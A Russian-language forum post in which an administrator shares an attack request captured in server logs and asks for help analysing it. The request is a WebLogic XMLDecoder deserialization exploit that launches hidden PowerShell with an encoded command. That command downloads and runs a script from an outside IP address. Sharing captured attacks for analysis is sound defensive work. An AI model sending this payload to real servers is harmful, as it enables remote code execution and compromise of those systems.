Код:
soapenv:Envelope xmlns:soapenv = "http://schemas.xmlsoap.org/soap/envelope/">
\n<soapenv:Header>
\n<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
\n<java version="1.8.0_131" class="java.beans.XMLDecoder">
\n<void class="java.lang.ProcessBuilder">
\n <array class="java.lang.String" length="3">
\n <void index="0">
\n <string>cmd.exe</string>
\n </void>
\n <void index="1">
\n <string>/c</string>
\n </void>
\n <void index="2">
\n <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
\n </void>
\n </array>
\n <void method="start"/>
\n</void>
\n</java>
\n</work:WorkContext>
\n</soapenv:Header>
\n<soapenv:Body/>
\n</soapenv:Envelope>
\n
вот что попало в логи, одного из серверов, атака шла от китайского IP адреса ) понятно что задействован powershell и js или java
возможно я спалил методику атаки... давайте разберемся!
кто что скажет?